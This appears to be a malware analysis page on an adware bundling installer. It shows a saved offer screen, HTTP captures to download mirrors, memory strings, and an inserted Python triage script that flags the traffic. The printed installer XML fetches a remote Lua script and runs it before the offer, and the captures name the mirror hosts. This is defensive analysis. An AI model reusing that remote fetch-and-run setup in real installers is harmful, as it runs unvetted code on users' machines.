From: "Saved by Internet Explorer 11"..Subject: 628 by 282 Icy Offer..Date: Thu, 11 Sep 2014 14:39:31 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0007_01CFCDCE.32759F00"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0007_01CFCDCE.32759F00..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\stormwatch_tidy_double_628_2.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."http://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">..<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><HTML><HEAD><=..META=20..content=3D"IE=3D11.0000" http-equiv=3D"X-UA-Compatible">..<TITLE>628 by 282 Icy Offer</TITLE>=20..<META http-equiv=3D"X-UA-Compatible" content=3D"IE=3D11.0000">=20..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>..=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3DUTF-8"><!-- =0A=..=0A=..Edited by: Insert Initials & Date=0A=..Template Name: 628_Icy_2col_toolbar_EULA.php=0A=..=0A=..-->=20..<STYLE>BODY {=0A=...PADDING-BOTTOM: 0px; BACK
<<< skipped >>>
GET /checksuminstall?checksum=17679 HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: service.downloadadmin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 15 Dec 2015 00:32:59 GMT
Age: 0
X-Cache: MISS
008000
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Installer>
  <Bundle>
    <CustomParameter Name="ProductName">@ProductName</CustomParameter>
    <CustomParameter Name="ProductFileSize">@{ProductFileSize|1mb}</CustomParameter>
    <CustomParameter Name="ProductTos">@ProductTos</CustomParameter>
    <CustomParameter Name="PrivacyUrl">@PrivacyUrl</CustomParameter>
    <CustomParameter Name="bm.plain-thanks">true</CustomParameter>
    <File Action="Run before Offer" Destination="" DirMode="false" FileType="Content" ForceCreate="true" Options="@StartTrackingUrl" Scramble="false" ShowFolder="false" SourceDir="" SourceFile="hXXp://mirror.downloadmanager145.com/binstallers/BM2/api/do_tracking_hit.lua" WaitForExe="false" id="file-2"/>
    <LinkBelowEula>false</LinkBelowEula>
    <OptInDefault>false</OptInDefault>
    <ProductBinary embed="false" msioptions="@ProductMsiOptions" options="@ProductOptions">@ProductBinaryUrl</ProductBinary>
    <ProductEula comboPrimary="false" embed="false">hXXp://mirror.downloadnet1210.com/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht</ProductEula>
    <Primary>true</Primary>
    <ProductId>1175439</ProductId>
    <ProductName>@{ProductName|Adknowledge}</ProductName>
    <Scramble>false</Scramble>
  </Bundle>
  <Bundle&g
<<< skipped >>>
GET /env?browserVersion=11&osVersion=7&browserName=IE&c=fw35&variation=&pid=adknowledge&aid=adk&country=US&productKey=&s=fw35_300x250display5128768&brand=adknowledge.com&bc=1197303&osName=Windows HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: service.downloadadmin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/xml;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 15 Dec 2015 00:33:06 GMT
Age: 0
X-Cache: MISS
001827..<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Installer><Environment><Entry name="over-threshold:PremierOpinion (US) (1457)">true</Entry><Entry name="over-threshold:PremierOpinion (US) (1456)">true</Entry><Entry name="over-threshold:PremierOpinion (US) (1449)">true</Entry><Entry name="over-threshold:Optimizer Pro (US)">true</Entry><Entry name="over-threshold:Super Optimizer (US)">true</Entry><Entry name="over-threshold:PremierOpinion (UK)">true</Entry><Entry name="over-threshold:Super Optimizer (GB)">true</Entry><Entry name="over-threshold:Web Bar (GB)">true</Entry><Entry name="over-threshold:Web Bar (AU)">true</Entry><Entry name="over-threshold:Optimizer Pro (AR)">true</Entry><Entry name="over-threshold:Optimizer Pro (MX)">true</Entry><Entry name="over-threshold:Optimizer Pro (BR)">true</Entry><Entry name="over-threshold:Optimizer Pro (TR)">true</Entry><Entry name="over-threshold:Super Optimizer (DE)">true</Entry><Entry name="over-threshold:Super Optimizer (IN)">true</Entry><Entry name="over-threshold:Super Optimizer (RU)">true</Entry><Entry name="over-threshold:Super Optimizer (CN)">true</Entry><Entry name="over-threshold:Super Optimizer (ES)">true</Entry><Entry name="over-threshold:Super Optimizer (CH)">true</Entry><Entry name="over-threshold:Sup
<<< skipped >>>
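Three things in the requests above are worth extracting programmatically rather than by eye: the installer's User-Agent packs the host's state into key=value fields (ref, windows=5.1, uac=false, elevated=true, pid), Accept-Encoding advertises non-standard enc(RC4/sha1:<keyid>) tokens, and the /checksuminstall XML tells the installer to fetch do_tracking_hit.lua from a mirror and run it "before Offer". The following Python is an added triage script, not part of the Lavasoft report and not code from the analysed installer. The sample requests are copied from the capture, the XML is cut down to the first <Bundle> shown on the page, and its URLs are kept in the page's defanged hXXp:// form.

```python
"""Triage the HTTP capture above: decode the installer's User-Agent fields,
list the custom RC4 Accept-Encoding tokens, collect hosts, and pull remote
script/EULA URLs from the /checksuminstall <Installer> XML.
Added example; not part of the Lavasoft report or the analysed binary."""
import re
import xml.etree.ElementTree as ET

# Three requests copied from the capture (blank line between requests).
SAMPLE_REQUESTS = """\
GET /binstallers/BM2/api/do_tracking_hit.lua HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadmanager145.com
Connection: Keep-Alive

GET /skins/da/11122015/megazord_darkskin_nondlm_cancel.zip HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive

GET /checksuminstall?checksum=17679 HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: service.downloadadmin.com
Connection: Keep-Alive
"""

# First <Bundle> of the /checksuminstall response, trimmed to the elements
# used here; URLs kept in the page's defanged hXXp:// form.
SAMPLE_INSTALLER_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Installer>
  <Bundle>
    <CustomParameter Name="ProductName">@ProductName</CustomParameter>
    <File Action="Run before Offer" FileType="Content" Options="@StartTrackingUrl"
          SourceFile="hXXp://mirror.downloadmanager145.com/binstallers/BM2/api/do_tracking_hit.lua" id="file-2"/>
    <ProductEula comboPrimary="false" embed="false">hXXp://mirror.downloadnet1210.com/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht</ProductEula>
    <ProductId>1175439</ProductId>
  </Bundle>
</Installer>
"""

UA_RE = re.compile(r"^Cash Buyer Media\((?P<fields>.*)\)$")
ENC_RE = re.compile(r"enc\((?P<cipher>[A-Za-z0-9]+)/(?P<hash>[a-z0-9]+):(?P<keyid>[0-9a-f]+)\)")


def split_requests(raw):
    """Yield {'method', 'path', 'headers'} per blank-line-separated request."""
    for chunk in raw.strip().split("\n\n"):
        lines = chunk.splitlines()
        method, path, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        yield {"method": method, "path": path, "headers": headers}


def parse_user_agent(ua):
    """Decode the key=value fields inside 'Cash Buyer Media(...)'; None otherwise."""
    m = UA_RE.match(ua)
    if not m:
        return None
    fields = {}
    for item in m.group("fields").split(";"):
        key, _, value = item.partition("=")
        fields[key.strip()] = value.strip().strip("[]")  # ref=[...] is bracketed
    return fields


def custom_encodings(accept_encoding):
    """Return (cipher, hash, keyid) for every non-standard enc(...) token."""
    return [m.group("cipher", "hash", "keyid")
            for m in ENC_RE.finditer(accept_encoding or "")]


def triage(raw):
    """Summarise hosts, the decoded User-Agent and the advertised RC4 key ids."""
    hosts, key_ids, ua_fields = set(), set(), None
    for req in split_requests(raw):
        h = req["headers"]
        hosts.add(h.get("host", "<no Host header>"))
        ua_fields = ua_fields or parse_user_agent(h.get("user-agent", ""))
        for _cipher, _hash, keyid in custom_encodings(h.get("accept-encoding")):
            key_ids.add(keyid)
    return {"hosts": sorted(hosts), "ua": ua_fields, "rc4_key_ids": sorted(key_ids)}


def remote_scripts(xml_text):
    """List <File> entries with a URL SourceFile (and their Action) plus EULA URLs."""
    root = ET.fromstring(xml_text)
    files = [(f.get("Action"), f.get("SourceFile"))
             for f in root.iter("File") if "://" in (f.get("SourceFile") or "")]
    eulas = [(e.text or "").strip() for e in root.iter("ProductEula")]
    return files, eulas


if __name__ == "__main__":
    s = triage(SAMPLE_REQUESTS)
    print("hosts:", ", ".join(s["hosts"]))
    print("install context:", {k: s["ua"][k] for k in ("windows", "uac", "elevated", "pid")})
    print("RC4 key ids advertised:", s["rc4_key_ids"])
    for action, url in remote_scripts(SAMPLE_INSTALLER_XML)[0]:
        print(f"remote file, Action={action!r}: {url}")
```

The hosts list and the decoded User-Agent are what you would feed into a blocklist or a proxy-log search (the "Cash Buyer Media(" prefix alone is a usable signature). The entry to flag is any <File> whose SourceFile is a URL and whose Action is "Run before Offer": the installer fetches that Lua script from the mirror at install time and runs it, so whatever the mirror serves at that moment is what executes.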
Map
The Malware connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_580:
.text
`.rdata
@.data
.rsrc
PSSSSSSh
6HdH.ls@zSNqT{hff)@ #
advapi32.dll
debug.pdb
comdlg32.dll
SetNamedPipeHandleState
CreateNamedPipeA
GetProcessHeap
KERNEL32.dll
GDI32.dll
USER32.dll
msvcrt.dll
_acmdln
_amsg_exit
ole32.dll
SHFileOperationA
ShellExecuteExA
ShellExecuteA
SHELL32.dll
55555555
lua51.dll
CoCreateInstance failed(rc=%d)
All Files|*.*
Error creating ShellLink(rc=%d)
CryptDuplicateKey
CryptDeriveKey
CryptDestroyKey
luabridge.dll
shared_library.dll
luabridge.config
luabridge.net
resources.js
luabridge.nsis
444444444
%d.%d.%d
win32.shell
luabridge.win32
__LOCALEXPORTS
luabridge.registry
111111111
./lua51.dll
local rshift,lshift,band=bit.rshift,bit.lshift,bit.band
local tohex=bit.tohex;
local dict=ffi.new("char[?]",64)
function M.setSymbols(symbols)
ffi.copy(dict,symbols,64);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
table.insert(buf,seg);
seg=string.char(dict[idx]);
seg=seg .. string.char(dict[bits]);
table.insert(buf,seg)
table.insert(buf,({"",string.rep(placeholder,2),placeholder})[(#data % 3)+1])
return table.concat(buf);
local block=ffi.new("char[?]",block_sz);
function M.unb64(data)
table.insert(buf,ffi.string(block,p));
local seg=ffi.string(block,p);
--print("Append ",oldp,eqs,seg,ffi.string(block,oldp));
table.insert(buf,seg);
return table.concat(buf)
M.setSymbols(DEF_DICT);
function M.defaultDict()
M.setSymbols(DEF_DICT);
M.unfilter = M.unb64
M.setSymbols(loadarg);
return M.unb64;
Press any key to continue
require("logging").loggerFor("bundle_manager").Info("RunLoop Exited .. Cleaning Up");
return require('cleanup').runCleanup()
dialog.image
resources.nsis
./extramod.dll
%d.%.%d
luabridge.classes
resources.binlib
resources.overlay
luabridge.fs
mime.core
dialog.html
resources.compressed
key_duplicate
key_encrypt
777777777
%s expected data in index [1]
key_destroy
Win32.Crypt.Key
derive_key
Win32.Crypt.Hash
key_decrypt
provider_dervice_key
%s expected table argument
default_key
bad argument #%d to %s('%s' expected)
Win32.Crypto.Provider
%s expected 'length' with lightuserdata
%s
99999999
miniz.DeflateZStream
inflateInit() failed (rc=%s)
deflate() failed(rc=%d)
Unsupported filter input(string|nil) expected
miniz.InflateZStream
inflate() failed(rc=%d)
deflateInit() failed (rc=%s)
Mime 1.0.3
zcÃ
version="61.6.7.6620"
setup.exe
61.6.7.6620
%original file name%.exe_928:
.text
`.rdata
@.data
.rsrc
PSSSSSSh
6HdH.ls@zSNqT{hff)@ #
advapi32.dll
debug.pdb
comdlg32.dll
SetNamedPipeHandleState
CreateNamedPipeA
GetProcessHeap
KERNEL32.dll
GDI32.dll
USER32.dll
msvcrt.dll
_acmdln
_amsg_exit
ole32.dll
SHFileOperationA
ShellExecuteExA
ShellExecuteA
SHELL32.dll
55555555
lua51.dll
CoCreateInstance failed(rc=%d)
All Files|*.*
Error creating ShellLink(rc=%d)
CryptDuplicateKey
CryptDeriveKey
CryptDestroyKey
luabridge.dll
shared_library.dll
luabridge.config
luabridge.net
resources.js
luabridge.nsis
444444444
%d.%d.%d
win32.shell
luabridge.win32
__LOCALEXPORTS
luabridge.registry
111111111
./lua51.dll
local rshift,lshift,band=bit.rshift,bit.lshift,bit.band
local tohex=bit.tohex;
local dict=ffi.new("char[?]",64)
function M.setSymbols(symbols)
ffi.copy(dict,symbols,64);
seg = seg .. string.char(dict[bits]);
seg = seg .. string.char(dict[bits]);
table.insert(buf,seg);
seg=string.char(dict[idx]);
seg=seg .. string.char(dict[bits]);
table.insert(buf,seg)
table.insert(buf,({"",string.rep(placeholder,2),placeholder})[(#data % 3)+1])
return table.concat(buf);
local block=ffi.new("char[?]",block_sz);
function M.unb64(data)
table.insert(buf,ffi.string(block,p));
local seg=ffi.string(block,p);
--print("Append ",oldp,eqs,seg,ffi.string(block,oldp));
table.insert(buf,seg);
return table.concat(buf)
M.setSymbols(DEF_DICT);
function M.defaultDict()
M.setSymbols(DEF_DICT);
M.unfilter = M.unb64
M.setSymbols(loadarg);
return M.unb64;
Press any key to continue
require("logging").loggerFor("bundle_manager").Info("RunLoop Exited .. Cleaning Up");
return require('cleanup').runCleanup()
dialog.image
resources.nsis
./extramod.dll
%d.%.%d
luabridge.classes
resources.binlib
resources.overlay
luabridge.fs
mime.core
dialog.html
resources.compressed
key_duplicate
key_encrypt
777777777
%s expected data in index [1]
key_destroy
Win32.Crypt.Key
derive_key
Win32.Crypt.Hash
key_decrypt
provider_dervice_key
%s expected table argument
default_key
bad argument #%d to %s('%s' expected)
Win32.Crypto.Provider
%s expected 'length' with lightuserdata
%s
99999999
miniz.DeflateZStream
inflateInit() failed (rc=%s)
deflate() failed(rc=%d)
Unsupported filter input(string|nil) expected
miniz.InflateZStream
inflate() failed(rc=%d)
deflateInit() failed (rc=%s)
Mime 1.0.3
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp/h0nthn80NmAxFi2CggC
c:\%original file name%.exe
?456789:;
!"#$%&'()*+,-./0123
version="61.6.7.6620"
setup.exe
61.6.7.6620